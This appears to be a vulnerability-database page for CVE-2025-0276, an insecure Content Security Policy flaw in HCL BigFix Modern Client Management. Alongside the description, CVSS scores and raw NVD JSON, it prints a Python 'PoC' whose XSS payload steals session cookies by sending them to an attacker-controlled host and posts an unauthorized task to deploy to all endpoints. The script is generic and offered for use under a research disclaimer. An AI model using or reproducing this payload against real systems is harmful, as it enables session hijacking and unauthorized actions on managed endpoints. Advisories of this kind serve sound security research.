Security Vulnerability Report
中文
CVE-2025-0276 CVSS 6.5 MEDIUM

CVE-2025-0276

Published: 2025-10-16 09:15:32
Last Modified: 2025-10-21 13:03:12
Source: [email protected]

Description

HCL BigFix Modern Client Management (MCM) 3.3 and earlier are vulnerable to certain insecure directives within the Content Security Policy (CSP). An attacker could trick users into performing actions by not properly restricting the sources of scripts and other content.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_mobile:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:bigfix_modern_client_management:*:*:*:*:*:*:*:* - VULNERABLE
HCL BigFix Modern Client Management (MCM) <= 3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-0276 PoC - HCL BigFix MCM CSP Bypass # This PoC demonstrates exploitation of insecure CSP directives # in HCL BigFix Modern Client Management (MCM) <= 3.3 import requests from urllib.parse import urljoin TARGET_URL = "https://target-bigfix-mcm-server:443" MALICIOUS_PAYLOAD_HOST = "https://attacker-controlled-server.com" def check_csp_headers(target_url): """Check if the target has insecure CSP directives""" response = requests.get(target_url, verify=False) csp_header = response.headers.get("Content-Security-Policy", "") insecure_directives = [] # Check for unsafe-inline directive if "unsafe-inline" in csp_header: insecure_directives.append("'unsafe-inline' allows inline script execution") # Check for unsafe-eval directive if "unsafe-eval" in csp_header: insecure_directives.append("'unsafe-eval' allows eval() execution") # Check for wildcard sources if "*" in csp_header or "data:" in csp_header: insecure_directives.append("Wildcard or data: URI in source list") # Check for missing frame-ancestors if "frame-ancestors" not in csp_header: insecure_directives.append("Missing frame-ancestors directive (clickjacking risk)") return insecure_directives def craft_xss_payload(): """Craft an XSS payload that bypasses the insecure CSP""" # Since CSP allows 'unsafe-inline', inline scripts can be executed payload = """ <script> // Exploit: Steal session cookie or perform unauthorized actions var sessionToken = document.cookie; var img = new Image(); img.src = 'https://attacker-controlled-server.com/steal?token=' + encodeURIComponent(sessionToken); // Perform CSRF-like action: create unauthorized task fetch('/api/tasks', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({ name: 'Malicious Task', action: 'deploy', target: 'all-endpoints' }) }); </script> """ return payload def exploit(target_url): """Main exploit function""" print(f"[*] Target: {target_url}") print("[*] Checking CSP configuration...") issues = check_csp_headers(target_url) if issues: print("[!] Insecure CSP directives found:") for issue in issues: print(f" - {issue}") print("\n[*] Crafting XSS payload to bypass CSP...") payload = craft_xss_payload() print(f"[+] Payload ready: {payload[:100]}...") print("[+] Host the payload on attacker-controlled page") print("[+] Trick authenticated admin to visit the malicious page") else: print("[-] CSP appears to be properly configured") if __name__ == "__main__": exploit(TARGET_URL)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-0276", "sourceIdentifier": "[email protected]", "published": "2025-10-16T09:15:31.690", "lastModified": "2025-10-21T13:03:12.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL BigFix Modern Client Management (MCM) 3.3 and earlier are vulnerable to certain insecure directives within the Content Security Policy (CSP). An attacker could trick users into performing actions by not properly restricting the sources of scripts and other content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-80"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_mobile:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.3", "matchCriteriaId": "97CEC651-375F-4FE8-B947-0A3D89FF0267"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_modern_client_management:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4", "matchCriteriaId": "251EA75C-E4D9-4A13-B13D-02DFF9E6161D"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124513", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.